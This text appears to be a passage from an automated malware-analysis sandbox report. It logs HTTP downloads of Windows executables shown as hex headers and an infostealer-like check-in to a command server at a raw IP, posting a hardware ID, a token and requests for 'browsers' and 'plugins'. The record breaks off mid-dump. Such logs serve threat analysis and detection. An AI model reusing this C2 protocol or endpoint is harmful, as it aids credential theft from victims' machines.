00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 06 Dec 2024 19:52:46 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 06 Dec 2024 19:52:48 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 06 Dec 2024 19:52:51 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 06 Dec 2024 19:52:52 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 06 Dec 2024 19:52:58 GMTContent-Type: application/octet-streamContent-Length: 3221504Last-Modified: Fri, 06 Dec 2024 19:41:03 GMTConnection: keep-aliveETag: "6753534f-312800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 98 01 00 00 00 00 00 00 30 31 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 31 00 00 04 00 00 44 1a 32 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 88 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 1b 31 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 98 1b 31 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 80 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 88 03 00 00 00 90 06 00 00 04 00 00 00 90 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 94 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 75 72 64 79 77 69 79 77 00 70 2a 00 00 b0 06 00 00 6c 2a 00 00 96 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 70 77 74 6f 78 62 6e 67 00 10 00 00 00 20 31 00 00 04 00 00 00 02 31 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 30 31 00 00 22 00 00 00 06 31 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 06 Dec 2024 19:54:09 GMTContent-Type: application/octet-streamContent-Length: 1861632Last-Modified: Fri, 06 Dec 2024 19:40:49 GMTConnection: keep-aliveETag: "67535341-1c6800"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 62 af 50 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 c6 03 00 00 ac 00 00 00 00 00 00 00 c0 49 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 49 00 00 04 00 00 48 97 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5c 30 05 00 70 00 00 00 00 20 05 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 31 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 10 05 00 00 10 00 00 00 32 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 20 05 00 00 04 00 00 00 42 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 30 05 00 00 02 00 00 00 46 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 70 2a 00 00 40 05 00 00 02 00 00 00 48 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6b 67 73 65 63 79 78 67 00 00 1a 00 00 b0 2f 00 00 f8 19 00 00 4a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 77 69 6a 76 69 66 6c 79 00 10 00 00 00 b0 49 00 00 04 00 00 00 42 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 c0 49 00 00 22 00 00 00 46 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGDAAEHDHIIJKECBKEBAHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 44 41 41 45 48 44 48 49 49 4a 4b 45 43 42 4b 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 43 42 39 37 33 32 30 44 44 30 46 38 30 37 36 35 36 36 31 35 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 41 41 45 48 44 48 49 49 4a 4b 45 43 42 4b 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 72 75 6d 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 41 41 45 48 44 48 49 49 4a 4b 45 43 42 4b 45 42 41 2d 2d 0d 0a Data Ascii: ------BGDAAEHDHIIJKECBKEBAContent-Disposition: form-data; name="hwid"ECB97320DD0F807656615------BGDAAEHDHIIJKECBKEBAContent-Disposition: form-data; name="build"drum------BGDAAEHDHIIJKECBKEBA--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIJKEHJJDAAKFHIDAKFHHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 49 4a 4b 45 48 4a 4a 44 41 41 4b 46 48 49 44 41 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 32 37 64 62 36 62 35 36 34 33 35 30 61 34 37 64 65 30 65 65 30 63 35 32 39 35 36 37 63 38 30 35 66 32 61 35 37 33 63 38 35 65 66 34 32 33 31 37 37 62 36 30 31 39 34 32 36 32 34 32 32 66 38 64 37 32 37 63 66 38 38 0d 0a 2d 2d 2d 2d 2d 2d 46 49 4a 4b 45 48 4a 4a 44 41 41 4b 46 48 49 44 41 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 46 49 4a 4b 45 48 4a 4a 44 41 41 4b 46 48 49 44 41 4b 46 48 2d 2d 0d 0a Data Ascii: ------FIJKEHJJDAAKFHIDAKFHContent-Disposition: form-data; name="token"627db6b564350a47de0ee0c529567c805f2a573c85ef423177b60194262422f8d727cf88------FIJKEHJJDAAKFHIDAKFHContent-Disposition: form-data; name="message"browsers------FIJKEHJJDAAKFHIDAKFH--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JEGHJDGIJECGDHJJECGHHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 45 47 48 4a 44 47 49 4a 45 43 47 44 48 4a 4a 45 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 32 37 64 62 36 62 35 36 34 33 35 30 61 34 37 64 65 30 65 65 30 63 35 32 39 35 36 37 63 38 30 35 66 32 61 35 37 33 63 38 35 65 66 34 32 33 31 37 37 62 36 30 31 39 34 32 36 32 34 32 32 66 38 64 37 32 37 63 66 38 38 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 47 48 4a 44 47 49 4a 45 43 47 44 48 4a 4a 45 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 47 48 4a 44 47 49 4a 45 43 47 44 48 4a 4a 45 43 47 48 2d 2d 0d 